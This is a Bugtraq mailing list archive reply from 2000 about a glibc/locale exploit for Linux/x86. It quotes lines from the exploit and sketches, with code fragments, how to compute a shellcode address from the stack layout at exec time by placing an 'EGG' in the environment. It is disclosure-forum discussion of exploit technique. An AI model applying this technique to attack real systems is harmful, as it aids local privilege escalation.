Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: glibc/locale exploit for linux/x86

From: Olaf Kirch <okir () CALDERA DE>
Date: Thu, 7 Sep 2000 10:43:37 +0200
On Wed, Sep 06, 2000 at 09:01:47PM +0800, Warning3 wrote:

    printf("Using RET location address: 0x%x\n", retloc);
    shell_addr = get_esp() + offset;


I've always wondered why all these exploits mess around with
strange offsets... When the ix86 Linux kernel execs an ELF program,
the stack looks like this (at least it did every time I checked)

0x80000000
0x7FFFFFFC 00 00 00 00
           argv[0] + NUL byte
           last envar
           ...
           first envar
           argv

So it's easy to compute the start of your shell code without
having to rely on magic offsets:

        shell_addr = (caddr_t) 0x7FFFFFFC
                        - strlen(ARGV0) - 1
                        - strlen(EGG) - 1;
        ...
        n = 0;
        myenv[n++] = ...
        myenv[n++] = EGG;
        myenv[n++] = NULL;
        execle(VICTIM_PROGRAM, ARGV0, ..., NULL, myenv);

Just wondering...
Olaf
--
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir () monad swb de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir () caldera de    +-------------------- Why Not?! -----------------------
         UNIX, n.: Spanish manufacturer of fire extinguishers.
Previous By Date Next
Previous By Thread Next

Current thread: